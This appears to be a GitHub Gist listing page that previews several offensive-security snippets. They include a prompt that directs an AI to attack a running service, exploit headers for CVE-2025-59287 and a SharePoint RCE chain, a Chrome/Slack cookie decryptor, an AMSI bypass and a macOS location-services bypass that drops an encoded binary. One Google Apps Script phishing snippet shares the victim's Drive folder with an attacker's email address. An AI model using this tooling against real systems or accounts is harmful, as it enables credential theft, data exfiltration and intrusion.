Skip to content

Instantly share code, notes, and snippets.

@evilsocket
evilsocket / security_code_audit.md
Created May 17, 2026 17:40
security code audit

You are an expert software engineer and offensive security practitioner conducting a security audit of this codebase. Your goal is to find realistic, high-impact bugs and prove them against a running instance of the service.

Scope of interest (critical / high severity only)

  • Remote code execution
  • User impersonation / takeover
  • Authentication / authorization bypass
  • Detection / filter / trait bypass (if the service is a detection system)
  • Path traversal, SSRF, deserialization flaws, injection (SQL/command/log/header)
  • SQL injection, command injection, XSS injection and so on.
@hawktrace
hawktrace / gist:76b3ea4275a5e2191e6582bdc5a0dc8b
Last active May 24, 2026 04:10
HawkTrace CVE-2025-59287
#!/usr/bin/env python3
import requests
import urllib3
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
import sys
import uuid
from xml.sax.saxutils import escape
@theevilbit
theevilbit / parse.sh
Last active September 3, 2024 03:29
Tools for working with widgets
#!/bin/bash
# Check for required command line arguments
if [ $# -ne 2 ]; then
echo "Usage: $0 <input_file> <output_dir>"
exit 1
fi
input_file=$1
output_dir=$2
@WKL-Sec
WKL-Sec / ParentProcessValidator.cpp
Created February 9, 2024 13:47
This C++ code snippet demonstrates how to verify if an executable is launched by explorer.exe to enhance security during red team operations.
# White Knight Labs - Offensive Development
# Guardrails - Parent Process Check
#include <windows.h>
#include <tlhelp32.h>
#include <psapi.h>
#include <tchar.h>
#include <iostream>
// Function to get the ID of the parent process
@testanull
testanull / SharePwn_public.py
Created December 15, 2023 07:31
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@Tw1sm
Tw1sm / decrypt_cookies.py
Last active February 25, 2025 18:41
Decrypt Slack/Chrome Cookies
import sqlite3
import sys
import json
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
kSalt = "saltysalt"
kDerivedKeySizeInBits = 128
kEncryptionIterations = 1003
kEncryptionVersionPrefix = "v10"
@ahhh
ahhh / driveSearch.gs
Last active June 16, 2023 00:55
Google App Script Phishing #2
function driveSearch() {
// Setup the exfil folder
var user = Session.getActiveUser().getEmail();
var folder = DriveApp.createFolder(user);
var attackerEmail = "ahhh.db@gmail.com";
folder.addViewer(attackerEmail);
// Search Drive
var files = DriveApp.searchFiles('hidden = false');
// Iterate through files in Drive
@susMdT
susMdT / Program.cs
Created February 24, 2023 02:57
C# Amsi bypass with hardware breakpint
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
// CCOB IS THE GOAT
@theevilbit
theevilbit / cve_2022_22655_mount_locationd.sh
Last active December 12, 2024 17:59
CVE-2022-22655 - macOS Location Services Bypass
#!/bin/zsh
echo "++ Stopping locationd"
sudo launchctl stop com.apple.locationd
echo "++ Dropping swiftliverpool"
echo z/rt/gcAAAEDAAAAAgAAAB4AAACwDQAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA+AQAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAUAAAAFAAAADwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAALAtAAABAAAAa0AAAAAAAACwLQAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAHG4AAAEAAACiAAAAAAAAABxuAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAADAbgAAAQAAAB4BAAAAAAAAwG4AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NvbnN0AAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAOBvAAABAAAALgEAAAAAAADgbwAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9fc3dpZnQ1X3R5cGVyZWZfX1RFWFQAAAAAAAAAAAAADnEAAAEAAAAkAAAAAAAAAA5xAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX19vYmpjX21ldGhuYW1lAF9fVEVYVAAAAAAAAAAAAAAycQAAAQAAACwBAAAAAAAAMnEAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19UR
@jhaddix
jhaddix / reconftw.cfg
Last active September 24, 2025 23:27
reconFTW config file: NO google/osint, wordlist creation, nuclei js analysis
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator